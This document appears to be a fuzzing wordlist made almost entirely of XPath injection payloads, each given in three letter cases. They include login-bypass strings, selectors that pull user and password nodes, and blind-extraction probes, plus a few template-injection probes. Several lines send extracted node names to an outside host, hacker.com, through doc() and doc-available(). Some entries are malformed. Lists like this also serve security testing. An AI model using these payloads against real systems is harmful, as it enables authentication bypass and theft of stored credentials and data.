" Or "1"="1
" or "1"="1
" OR "1"="1
" or "admin
" OR "ADMIN
" Or "Admin
$
%
&Apos;Xoizr
&APOS;XOIZR
&apos;xoizr
&apos;XoiZR
&LT;% TNN96 %&GT;
&Lt;% Tnn96 %&Gt;
&lt;% Tnn96 %&gt;
&lt;% tnn96 %&gt;
&lt;%= tnn96 %&gt;
&LT;%= TNN96 %&GT;
&Lt;%= Tnn96 %&Gt;
&lt;%= Tnn96 %&gt;
&lt;? tnn96 ?&gt;
&LT;? TNN96 ?&GT;
&Lt;? Tnn96 ?&Gt;
&lt;? Tnn96 ?&gt;
&LT;?TNN96 ?&GT;
&Lt;?Tnn96 ?&Gt;
&lt;?Tnn96 ?&gt;
&lt;?tnn96 ?&gt;
&LT;TNN96&GT;
&lt;Tnn96&gt;
&Lt;Tnn96&Gt;
&lt;tnn96&gt;
&Quot;Xoizr
&QUOT;XOIZR
&quot;xoizr
&quot;XoiZR
' AND COUNT(/*)=1 AND '1'='1
' And Count(/*)=1 And '1'='1
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' AND COUNT(/@*)=1 AND '1'='1
' And Count(/@*)=1 And '1'='1
' AND COUNT(/COMMENT())=1 AND '1'='1
' And Count(/Comment())=1 And '1'='1
' and count(/comment())=1 and '1'='1
' OR "A" OR '
' or "a" or '
' Or "A" Or '
' or ''='
' Or ''='
' OR ''='
' or '1'='1
' OR '1'='1
' Or '1'='1
' or /* or '
' OR /* OR '
' Or /* Or '
' Or 1 Or '
' or 1 or '
' OR 1 OR '
' Or 1]%00
' or 1]%00
' OR 1]%00
' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''='
' OR STRING-LENGTH(//USER[POSITION()=1]/CHILD::NODE()[POSITION()=1])=4 OR ''='
' Or String-Length(//User[Position()=1]/Child::Node()[Position()=1])=4 Or ''='
' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''='
' Or Substring((//User[Position()=1]/Child::Node()[Position()=1]),1,1)="A" Or ''='
' OR SUBSTRING((//USER[POSITION()=1]/CHILD::NODE()[POSITION()=1]),1,1)="A" OR ''='
' OR TRUE() OR '
' or true() or '
' Or True() Or '
') OR 1=1 OR ('
') or 1=1 or ('
') Or 1=1 Or ('
') OR 1=1] | //USER/PASSWORD[('')=('
') Or 1=1] | //User/Password[('')=('
') or 1=1] | //user/password[('')=('
') Or 2=1] | //User/Node()[('')=('
') or 2=1] | //user/node()[('')=('
') OR 2=1] | //USER/NODE()[('')=('
')] | //./node()[('')=('
')] | //./Node()[('')=('
')] | //./NODE()[('')=('
')] | //node()[('')=('
')] | //Node()[('')=('
')] | //NODE()[('')=('
')] | //Password%00
')] | //PASSWORD%00
')] | //password%00
')] | //USER/*[1] | A[('
')] | //user/*[1] | a[('
')] | //User/*[1] | A[('
')] | //USER/*[2] | A[('
')] | //User/*[2] | A[('
')] | //user/*[2] | a[('
')] | //user/*[3] | a[('
')] | //User/*[3] | A[('
')] | //USER/*[3] | A[('
')] | //User/*[4] | A[('
')] | //user/*[4] | a[('
')] | //USER/*[4] | A[('
')]/../*[3][TEXT()!=('
')]/../*[3][Text()!=('
')]/../*[3][text()!=('
'or contains(.,'adm') or'
'OR CONTAINS(.,'ADM') OR'
'Or Contains(.,'Adm') Or'
'Or Contains(Name,'Adm') Or'
'or contains(name,'adm') or'
'OR CONTAINS(NAME,'ADM') OR'
'or position()=2 or'
'Or Position()=2 Or'
'OR POSITION()=2 OR'
'or string-length(name(.))<10 or'
'Or String-Length(Name(.))<10 Or'
'OR STRING-LENGTH(NAME(.))<10 OR'
(tnn96)
(Tnn96)
(TNN96)
*
*/*
+
-
-1
/
//
//*
//name
//NAME
//Name
//Name/Child::Node()
//name/child::node()
//NAME/CHILD::NODE()
//name/node()
//NAME/NODE()
//Name/Node()
//User/Child::Node()
//user/child::node()
//USER/CHILD::NODE()
//User/Name
//USER/NAME
//user/name
//user/node()
//User/Node()
//USER/NODE()
//user[last()-1]/name #mark
//User[Last()-1]/Name #Mark
//USER[LAST()-1]/NAME #MARK
//User[Position()=1]/Child::Node()[Position()=2]
//USER[POSITION()=1]/CHILD::NODE()[POSITION()=2]
//user[position()=1]/child::node()[position()=2]
//USER[POSITION()=1]/NAME
//user[position()=1]/name
//User[Position()=1]/Name
/User/Name
/user/name
/USER/NAME
:
;
@
@*
[TNN96]
[Tnn96]
[tnn96]
Admin' Or '
ADMIN' OR '
admin' or '
admin' or '1'='2
Admin' Or '1'='2
ADMIN' OR '1'='2
And Count(/*) = 1 
and count(/*) = 1 
AND COUNT(/*) = 1 
and count(/*[1]/*) = 2 
AND COUNT(/*[1]/*) = 2 
And Count(/*[1]/*) = 2 
AND COUNT(/*[1]/*[1]/*) = 1 
And Count(/*[1]/*[1]/*) = 1 
and count(/*[1]/*[1]/*) = 1 
And Count(/*[1]/*[1]/*[1]/*) = 0 
and count(/*[1]/*[1]/*[1]/*) = 0 
AND COUNT(/*[1]/*[1]/*[1]/*) = 0 
and count(/*[1]/*[2]/*) = 3
And Count(/*[1]/*[2]/*) = 3
AND COUNT(/*[1]/*[2]/*) = 3
And Count(/*[1]/*[2]/*[1]/*) = 0
and count(/*[1]/*[2]/*[1]/*) = 0
AND COUNT(/*[1]/*[2]/*[1]/*) = 0
AND COUNT(/*[1]/*[2]/*[2]/*) = 0
and count(/*[1]/*[2]/*[2]/*) = 0
And Count(/*[1]/*[2]/*[2]/*) = 0
AND COUNT(/*[1]/*[2]/*[3]/*) = 1
And Count(/*[1]/*[2]/*[3]/*) = 1
and count(/*[1]/*[2]/*[3]/*) = 1
and count(/*[1]/*[2]/*[3]/[1]*) = 0
And Count(/*[1]/*[2]/*[3]/[1]*) = 0
AND COUNT(/*[1]/*[2]/*[3]/[1]*) = 0
and name(/*[1]) = "root" 
AND NAME(/*[1]) = "ROOT" 
And Name(/*[1]) = "Root" 
and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1)) = 105
And String-To-Codepoints(Substring(Name(/*[1]/*[1]/*),1,1)) = 105
AND STRING-TO-CODEPOINTS(SUBSTRING(NAME(/*[1]/*[1]/*),1,1)) = 105
And Substring(Name(/*[1]/*[1]),1,1) = "A" 
and substring(name(/*[1]/*[1]),1,1) = "a" 
AND SUBSTRING(NAME(/*[1]/*[1]),1,1) = "A" 
COUNT(//USER/NODE())
Count(//User/Node())
count(//user/node())
count(/child::node())
Count(/Child::Node())
COUNT(/CHILD::NODE())
Doc(Concat("Http://Hacker.Com/Oob/", Name(/*[1]/*[1]), Name(/*[1]/*[1]/*[1])))
doc(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
DOC(CONCAT("HTTP://HACKER.COM/OOB/", NAME(/*[1]/*[1]), NAME(/*[1]/*[1]/*[1])))
Doc-Available(Concat("Http://Hacker.Com/Oob/", Name(/*[1]/*[1]), Name(/*[1]/*[1]/*[1])))
doc-available(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
DOC-AVAILABLE(CONCAT("HTTP://HACKER.COM/OOB/", NAME(/*[1]/*[1]), NAME(/*[1]/*[1]/*[1])))
false
FALSE
False
name
Name
NAME
Null
null
NULL
search=')] | //user/*[contains(*,'
Search=')] | //User/*[Contains(*,'
SEARCH=')] | //USER/*[CONTAINS(*,'
search=har') and contains(../password,'c
SEARCH=HAR') AND CONTAINS(../PASSWORD,'C
search=Har') and contains(../password,'c
Search=Har') And Contains(../Password,'C
search=Har') and starts-with(../password,'c
Search=Har') And Starts-With(../Password,'C
search=har') and starts-with(../password,'c
SEARCH=HAR') AND STARTS-WITH(../PASSWORD,'C
string(//user[name/text()='' or '1'='1' and password/text()='' or '1'='1']/account/text())
STRING(//USER[NAME/TEXT()='' OR '1'='1' AND PASSWORD/TEXT()='' OR '1'='1']/ACCOUNT/TEXT())
String(//User[Name/Text()='' Or '1'='1' And Password/Text()='' Or '1'='1']/Account/Text())
string(//user[name/text()='' or true() or '' and password/text()='']/account/text())
String(//User[Name/Text()='' Or True() Or '' And Password/Text()='']/Account/Text())
STRING(//USER[NAME/TEXT()='' OR TRUE() OR '' AND PASSWORD/TEXT()='']/ACCOUNT/TEXT())
STRING(//USER[NAME/TEXT()=''OR POSITION()=2 OR'' AND PASSWORD/TEXT()='']/ACCOUNT/TEXT())
string(//user[name/text()=''or position()=2 or'' and password/text()='']/account/text())
String(//User[Name/Text()=''Or Position()=2 Or'' And Password/Text()='']/Account/Text())
string(//user[name/text()='admin' or '1'='2' and password/text()='']/account/text())
String(//User[Name/Text()='Admin' Or '1'='2' And Password/Text()='']/Account/Text())
STRING(//USER[NAME/TEXT()='ADMIN' OR '1'='2' AND PASSWORD/TEXT()='']/ACCOUNT/TEXT())
String-Length(//User[Position()=1]/Child::Node()[Position()=1])
STRING-LENGTH(//USER[POSITION()=1]/CHILD::NODE()[POSITION()=1])
string-length(//user[position()=1]/child::node()[position()=1])
Substrig(//User[Position()=2/Child::Node()[Position()=1],2,1)
SUBSTRIG(//USER[POSITION()=2/CHILD::NODE()[POSITION()=1],2,1)
substrig(//user[position()=2/child::node()[position()=1],2,1)
SUBSTRING(//USER[USERID=5]/USERNAME,2,1)="A"
Substring(//User[Userid=5]/Username,2,1)="A"
substring(//user[userid=5]/username,2,1)="a"
true
TRUE
True
User//Name
USER//NAME
user//name
user/name
USER/NAME
User/Name
x' or 1=1 or 'x'='y
X' Or 1=1 Or 'X'='Y
X' OR 1=1 OR 'X'='Y
x' or name()='username' or 'x'='y
X' OR NAME()='USERNAME' OR 'X'='Y
X' Or Name()='Username' Or 'X'='Y
{= Tnn96}
{= TNN96}
{= tnn96}
{Tnn96}
{TNN96}
{tnn96}
{{= Tnn96}}
{{= tnn96}}
{{= TNN96}}
{{Tnn96}}" Or ""="
{{TNN96}}" OR ""="
{{tnn96}}" or ""="
{{Tnn96}}" or ""="